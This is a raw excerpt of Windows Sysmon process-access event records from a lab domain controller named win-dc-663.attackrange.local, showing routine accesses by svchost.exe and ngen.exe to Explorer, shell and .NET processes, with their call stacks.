21:06:09.445{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A241-60D3-A004-00000000CF01}6968C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 
10341000x800000000000000021848Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:10.859{4DB9351A-9DDD-60D3-0D00-00000000CF01}904924C:\Windows\system32\svchost.exe{4DB9351A-9F48-60D3-DE00-00000000CF01}5812C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021847Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:10.859{4DB9351A-9DDD-60D3-0D00-00000000CF01}904924C:\Windows\system32\svchost.exe{4DB9351A-9F48-60D3-DE00-00000000CF01}5812C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021846Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:06:10.859{4DB9351A-9DDD-60D3-0D00-00000000CF01}904924C:\Windows\system32\svchost.exe{4DB9351A-9F48-60D3-DE00-00000000CF01}5812C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021845Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:10.859{4DB9351A-9DDD-60D3-0D00-00000000CF01}904924C:\Windows\system32\svchost.exe{4DB9351A-9F48-60D3-DE00-00000000CF01}5812C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021844Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:06:10.859{4DB9351A-9DDD-60D3-0D00-00000000CF01}904924C:\Windows\system32\svchost.exe{4DB9351A-9F48-60D3-DE00-00000000CF01}5812C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021843Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:10.859{4DB9351A-9DDD-60D3-0D00-00000000CF01}904924C:\Windows\system32\svchost.exe{4DB9351A-9F48-60D3-DE00-00000000CF01}5812C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021842Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:06:10.859{4DB9351A-9DDD-60D3-0D00-00000000CF01}904924C:\Windows\system32\svchost.exe{4DB9351A-9F48-60D3-DE00-00000000CF01}5812C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021841Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:10.859{4DB9351A-9DDD-60D3-0D00-00000000CF01}904924C:\Windows\system32\svchost.exe{4DB9351A-9F48-60D3-DE00-00000000CF01}5812C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021840Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:06:10.859{4DB9351A-9DDD-60D3-0D00-00000000CF01}904924C:\Windows\system32\svchost.exe{4DB9351A-9DDD-60D3-1100-00000000CF01}436C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021839Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:10.859{4DB9351A-9DDD-60D3-0D00-00000000CF01}904924C:\Windows\system32\svchost.exe{4DB9351A-9DDD-60D3-1100-00000000CF01}436C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021838Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:06:10.859{4DB9351A-9DDD-60D3-0D00-00000000CF01}904924C:\Windows\system32\svchost.exe{4DB9351A-9F49-60D3-DF00-00000000CF01}5948C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021837Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:10.859{4DB9351A-9DDD-60D3-0D00-00000000CF01}904924C:\Windows\system32\svchost.exe{4DB9351A-9F49-60D3-DF00-00000000CF01}5948C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021836Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:06:10.859{4DB9351A-9DDD-60D3-0D00-00000000CF01}904924C:\Windows\system32\svchost.exe{4DB9351A-9F49-60D3-DF00-00000000CF01}5948C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021835Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:10.859{4DB9351A-9DDD-60D3-0D00-00000000CF01}904924C:\Windows\system32\svchost.exe{4DB9351A-9F2C-60D3-D000-00000000CF01}5064C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021834Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:06:10.859{4DB9351A-9DDD-60D3-0D00-00000000CF01}904924C:\Windows\system32\svchost.exe{4DB9351A-9F2C-60D3-D000-00000000CF01}5064C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021833Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:10.859{4DB9351A-9DDD-60D3-0D00-00000000CF01}904924C:\Windows\system32\svchost.exe{4DB9351A-9F2C-60D3-D000-00000000CF01}5064C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021832Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:06:10.859{4DB9351A-9DDD-60D3-0D00-00000000CF01}904924C:\Windows\system32\svchost.exe{4DB9351A-9F2C-60D3-D000-00000000CF01}5064C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021831Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:10.859{4DB9351A-9DDD-60D3-0D00-00000000CF01}904924C:\Windows\system32\svchost.exe{4DB9351A-9F2C-60D3-D000-00000000CF01}5064C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021830Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:06:10.859{4DB9351A-9DDD-60D3-0D00-00000000CF01}904924C:\Windows\system32\svchost.exe{4DB9351A-9F2C-60D3-D000-00000000CF01}5064C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021829Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:10.859{4DB9351A-9DDD-60D3-0D00-00000000CF01}904924C:\Windows\system32\svchost.exe{4DB9351A-9F2C-60D3-D000-00000000CF01}5064C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021828Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:06:10.859{4DB9351A-9DDD-60D3-0D00-00000000CF01}904924C:\Windows\system32\svchost.exe{4DB9351A-9F2C-60D3-D000-00000000CF01}5064C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021827Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:10.859{4DB9351A-9DDD-60D3-0D00-00000000CF01}904924C:\Windows\system32\svchost.exe{4DB9351A-9F2C-60D3-D000-00000000CF01}5064C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021826Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:06:10.859{4DB9351A-9DDD-60D3-0D00-00000000CF01}904924C:\Windows\system32\svchost.exe{4DB9351A-9F2C-60D3-D000-00000000CF01}5064C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021825Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:10.859{4DB9351A-9DDD-60D3-0D00-00000000CF01}904924C:\Windows\system32\svchost.exe{4DB9351A-9F2C-60D3-D000-00000000CF01}5064C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021824Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:06:10.859{4DB9351A-9DDD-60D3-0D00-00000000CF01}904924C:\Windows\system32\svchost.exe{4DB9351A-9F2C-60D3-D000-00000000CF01}5064C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021823Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:10.859{4DB9351A-9DDD-60D3-0D00-00000000CF01}904924C:\Windows\system32\svchost.exe{4DB9351A-9F2C-60D3-D000-00000000CF01}5064C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021822Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:06:10.859{4DB9351A-9DDD-60D3-0D00-00000000CF01}904924C:\Windows\system32\svchost.exe{4DB9351A-9F2C-60D3-D000-00000000CF01}5064C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021821Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:10.859{4DB9351A-9DDD-60D3-0D00-00000000CF01}904924C:\Windows\system32\svchost.exe{4DB9351A-9F2C-60D3-D000-00000000CF01}5064C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021820Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:06:10.859{4DB9351A-9DDD-60D3-0D00-00000000CF01}904924C:\Windows\system32\svchost.exe{4DB9351A-9F2C-60D3-D000-00000000CF01}5064C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021819Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 